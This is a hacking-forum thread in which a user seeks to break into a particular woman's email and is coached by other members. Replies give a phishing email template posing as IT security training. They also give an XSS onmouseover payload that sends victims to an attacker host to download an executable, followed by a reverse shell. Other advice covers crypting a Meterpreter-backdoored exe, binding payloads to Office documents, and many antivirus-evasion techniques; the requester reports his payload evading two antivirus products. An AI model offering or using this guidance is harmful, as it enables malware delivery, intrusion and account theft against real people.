How Can I Use Kali Linux To Hack Email
#11
@Vector, hats off to you bro, i will check out the peCloackCapstone. and see how it works and will give you an update after i build an exe encrypt it with peCloackCapstone and perform a run time check. if it bypasses the mainstream av then it could be you have given me the solution i yearned for.
Reply
#12
1. Kali should only ever be used on a bootable USB when you have access to the network you're trying to infiltrate.
2. Hacking emails is a bit of a "social" construct so you should go that route
3. You can do everything on a simple Ubuntu disk that you can do on a Kali distro, since they are both Debian based they both have the same make up
Reply
#13
@ekultek thanks for chipping in, and pointed me to yet another SE direction. let me ask, if you were in my shoes where will you begin with the SE Construct? thanks for kind answers

(02-27-2018, 01:00 PM)Vector Wrote: If you can backdoor an exe with a Metasploit Meterpreter, or Reverse TCP Shell, you could use a portable executable encoder/crypter such as peCloackCapstone and try to avoid AV solutions with that.

i have tried to install the peCloackCapstone, it is giving me hard time cause their github page did not specify how to install it. i have tried means  every possible way  know to install stuff in kali but so far i have failed but will keep mr google busy on that front until i can be able to install it
Reply
#14
(02-28-2018, 02:04 AM)code419 Wrote: @ekultek thanks for chipping in, and pointed me to yet another SE direction. let me ask, if you were in my shoes where will you begin with the SE Construct? thanks for kind answers

(02-27-2018, 01:00 PM)Vector Wrote: If you can backdoor an exe with a Metasploit Meterpreter, or Reverse TCP Shell, you could use a portable executable encoder/crypter such as peCloackCapstone and try to avoid AV solutions with that.

i have tried to install the peCloackCapstone, it is giving me hard time cause their github page did not specify how to install it. i have tried means  every possible way  know to install stuff in kali but so far i have failed but will keep mr google busy on that front until i can be able to install it

It's a Python script. Go to the directory where your peCloak copy lives then open a terminal in there and type:

Code:
python [script name].py
Reply
#15
@ekultek thanks again, i already know that .py extension is python i must start installation of any file of that extension with 'python'. but this 'peCloackCapstone' file has .sh extension i have tried the installation with ./ with bash and sudo none seems to work. and there is no word or instruction how to install. i git cloned to desktop folder i named tools. so i will first cd into desktop then the tools folder. perhaps i download the file again this time direct and then extract and install maybe it will work that way.
also, i seemed to have found a solution, created and encrypted the payload yesterday, then i tested it in one of my physical machine that has windows 10 and nod 32 and malwarebytes installed, i launched the payload got connection neither nod32 nor malwarebytes could detect it for 5 hours. what i need now is how to bind the payload to a .docs file and rename it as invoicexe.docs before sending it to the target.
do you know how i can bind a payload to a .docs file in kali? or what tool i can use to bind the payload still it remains fud? thank you once again for reliable instructions and willingness to help
Reply
#16
(02-28-2018, 02:04 AM)code419 Wrote: @ekultek thanks for chipping in, and pointed me to yet another SE direction. let me ask, if you were in my shoes where will you begin with the SE Construct? thanks for kind answers

I would begin by creating a believable document or error or something and emailing it to a group of users as a educational training sort of thing. From there I would use an XSS vulnerable site to do a onmouseover on something they are guaranteed to mouse over and redirect it to a server that downloads a file and executes itself.

For example, lets say they are doing some sort of security training;

Example email:
Code:
Hello <insert email here> (usually on corporate networks you can get pretty close to the users name from their email address a lot of them use <LASTNAME>.<MIDDLE INITIAL>.<FIRST NAME>@<SERVER>.<EXT>)

Your security training has been moved to today, please follow this <HYPER-LINK-TO-REDIRECT-SITE> to get started.

Sincerely,
  IT Support

Once they have clicked that link there will be code executed in the browser and when the rollover lets say the banner image it will redirect them to whatever site I wish them to using something along the lines of;
Code:
<b onmouseover=window.location='https://myevilsite.site/pumpedupkicks.exe'>Please follow this link for the training</b> (You can also encode this using HTTP equivs and decode it on execution using #eval().)

After my dropper is in (if it works) set up the reverse TCP and do my thing.

This is just an example, but it should give you a pretty decent idea of what you need to do. The trick is to keep trying, and use different approaches a lot of people do phishing training, but not a lot do whale phishing training. So if you can get pictures of emails, spoof to something close, and get some sort of good looking fake creds you should be set.

On a side note you could also use the SEtoolkit located here: https://github.com/trustedsec/social-engineer-toolkit
Reply
#17
(02-28-2018, 11:41 PM)ekultek Wrote:
(02-28-2018, 02:04 AM)code419 Wrote: @ekultek thanks for chipping in, and pointed me to yet another SE direction. let me ask, if you were in my shoes where will you begin with the SE Construct? thanks for kind answers

I would begin by creating a believable document or error or something and emailing it to a group of users as a educational training sort of thing. From there I would use an XSS vulnerable site to do a onmouseover on something they are guaranteed to mouse over and redirect it to a server that downloads a file and executes itself.

For example, lets say they are doing some sort of security training;

Example email:
Code:
Hello <insert email here> (usually on corporate networks you can get pretty close to the users name from their email address a lot of them use <LASTNAME>.<MIDDLE INITIAL>.<FIRST NAME>@<SERVER>.<EXT>)

Your security training has been moved to today, please follow this <HYPER-LINK-TO-REDIRECT-SITE> to get started.

Sincerely,
  IT Support

Once they have clicked that link there will be code executed in the browser and when the rollover lets say the banner image it will redirect them to whatever site I wish them to using something along the lines of;
Code:
<b onmouseover=window.location='https://myevilsite.site/pumpedupkicks.exe'>Please follow this link for the training</b> (You can also encode this using HTTP equivs and decode it on execution using #eval().)

After my dropper is in (if it works) set up the reverse TCP and do my thing.

This is just an example, but it should give you a pretty decent idea of what you need to do. The trick is to keep trying, and use different approaches a lot of people do phishing training, but not a lot do whale phishing training. So if you can get pictures of emails, spoof to something close, and get some sort of good looking fake creds you should be set.

On a side note you could also use the SEtoolkit located here: https://github.com/trustedsec/social-engineer-toolkit

thank you so very much, i have been trying to do the same using beef in kali. i know the page she visits quite often so i can clone the page and insert the beef hook js and shorten the hook link and send it over to her. but i have been grappling with getting beef to work ngrok or vpn so i can do that without using my internal ip. any ideas i got this tutorial https://hackforums.net/showthread.php?ti...id56752029 am going to try it out now, it's been exhausting trying to get ngrok or vpn to work with beef, metasploit or setoolkit without having to go into my router setting. i will try the above. over all, i really thank you for very meaningful, positive and really engaging response

(02-27-2018, 01:00 PM)Vector Wrote: If you can backdoor an exe with a Metasploit Meterpreter, or Reverse TCP Shell, you could use a portable executable encoder/crypter such as peCloackCapstone and try to avoid AV solutions with that.

sir, i have not slept in about 18 hours. so when i sent in the last reply regarding peCloakCapstone, i was already mentally exhausted and was in the wrong folder. apologies i got it working and encrypted a payload, the resulting scan from viruscheckmate.com was very disheartening 21/31 detections.
Reply
#18
(03-01-2018, 09:58 AM)code419 Wrote:
(02-28-2018, 11:41 PM)ekultek Wrote:
(02-28-2018, 02:04 AM)code419 Wrote: @ekultek thanks for chipping in, and pointed me to yet another SE direction. let me ask, if you were in my shoes where will you begin with the SE Construct? thanks for kind answers

I would begin by creating a believable document or error or something and emailing it to a group of users as a educational training sort of thing. From there I would use an XSS vulnerable site to do a onmouseover on something they are guaranteed to mouse over and redirect it to a server that downloads a file and executes itself.

For example, lets say they are doing some sort of security training;

Example email:
Code:
Hello <insert email here> (usually on corporate networks you can get pretty close to the users name from their email address a lot of them use <LASTNAME>.<MIDDLE INITIAL>.<FIRST NAME>@<SERVER>.<EXT>)

Your security training has been moved to today, please follow this <HYPER-LINK-TO-REDIRECT-SITE> to get started.

Sincerely,
  IT Support

Once they have clicked that link there will be code executed in the browser and when the rollover lets say the banner image it will redirect them to whatever site I wish them to using something along the lines of;
Code:
<b onmouseover=window.location='https://myevilsite.site/pumpedupkicks.exe'>Please follow this link for the training</b> (You can also encode this using HTTP equivs and decode it on execution using #eval().)

After my dropper is in (if it works) set up the reverse TCP and do my thing.

This is just an example, but it should give you a pretty decent idea of what you need to do. The trick is to keep trying, and use different approaches a lot of people do phishing training, but not a lot do whale phishing training. So if you can get pictures of emails, spoof to something close, and get some sort of good looking fake creds you should be set.

On a side note you could also use the SEtoolkit located here: https://github.com/trustedsec/social-engineer-toolkit

thank you so very much, i have been trying to do the same using beef in kali. i know the page she visits quite often so i can clone the page and insert the beef hook js and shorten the hook link and send it over to her. but i have been grappling with getting beef to work ngrok or vpn so i can do that without using my internal ip. any ideas i got this tutorial https://hackforums.net/showthread.php?ti...id56752029 am going to try it out now, it's been exhausting trying to get ngrok or vpn to work with beef, metasploit or setoolkit without having to go into my router setting. i will try the above. over all, i really thank you for very meaningful, positive and really engaging response

(02-27-2018, 01:00 PM)Vector Wrote: If you can backdoor an exe with a Metasploit Meterpreter, or Reverse TCP Shell, you could use a portable executable encoder/crypter such as peCloackCapstone and try to avoid AV solutions with that.

sir, i have not slept in about 18 hours. so when i sent in the last reply regarding peCloakCapstone, i was already mentally exhausted and was in the wrong folder. apologies i got it working and encrypted a payload, the resulting scan from viruscheckmate.com was very disheartening 21/31 detections.
le try https://github.com/pasahitz/zirikatu
Reply
#19
i will try that as well, though i suspect it will no longer be fud, as i have seen several tutorials of it already in the past, since last year. this means it has been tried already by thousands of people like me, and some stupid one have scanned the result already, several times at virustoal and all the av have the signature already. nevertheless, i will try it in a few minutes and i must really thank all you guys, for a very willing and heartfelt help. im only days old here, and it felt like i have been part of your community from long time. thanks again, and i'd like to ask if you know any good way i can embed/bind a payload to a .docs file. i have been asking mr google this question since morning hours, in different ways and the answers mr google is bringing forth isn't very satisfactory and specific.
Reply
#20
(03-02-2018, 09:26 PM)code419 Wrote: i will try that as well, though i suspect it will no longer be fud, as i have seen several tutorials of it already in the past, since last year. this means it has been tried already by thousands of people like me, and some stupid one have scanned the result already, several times at virustoal and all the av have the signature already. nevertheless, i will try it in a few minutes and i must really thank all you guys, for a very willing and heartfelt help. im only days old here, and it felt like i have been part of your community from long time. thanks again, and i'd like to ask if you know any good way i can embed/bind a payload to a .docs file. i have been asking mr google this question since morning hours, in different ways and the answers mr google is bringing forth isn't very satisfactory and specific.

Man, I don't know what you are trying to make FUD but I'm gonna give you some tips.
You might want to get into binary modding, for what you said I think you already know how AVs detect malware, so maybe try some signature fucker/zero or something like AV fucker. 

Use command-line avs to use less memory and check that the version allows the signature fucker method. Some of them detect that you are doing this and stop giving you good results (e.g. Nod32 after version 4).

DSplit might also be interesting, you can even use both at the same time.

Make your own crypter or don't use a saturated one. Some packers are automatically detected, make your research first. And in case you're using AutoIT, it's basically the same thing, auto-detected just for the autoIT interpreter.

Use code obsfuscation too, there are several methods used in the wild, you can convert the code to unicode or whatever, the analyst will have to use hex editor and that's a pain in the ass imo.
You can also make variables for the alphabet letters making the text totally illegible.

If you want you can use .vbs that will give you trust because it's run by the windows scripting host. However, just like autoIT some AVs will detect you automatically, in this case just for using certain functions, at the moment I don't remember which ones exactly but you can make a research for that in case you're interested.

Finally, you should look into some polimorfic engines.

That's just for the scantime but there is a lot more for runtime.
Try with those methods it should suffice for most AVs 

That's all for making it FUD, for making docs... don't use the actual file, use droppers instead, or if you get detected you get automatically fucked and all your work for making it FUD gets lost. Doc files use vba so check that instead and it will give you a lot of results.

Good luck man!
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  How to Hack Like a Pornstar - Learn to break into a Bank sparc.flow 22 36,032 07-28-2020, 06:23 PM
Last Post: Vector
  Can you name a few open source tools for offline password cracking? ShadowRaider 2 2,722 06-30-2020, 01:54 AM
Last Post: poppopret
  Ideas for Privilege Escalation (Linux) Insider 2 2,690 04-30-2020, 12:19 AM
Last Post: DeepLogic
  Can ColoCrossing spoof IP header now? feeder986 2 3,595 03-10-2019, 05:25 PM
Last Post: Insider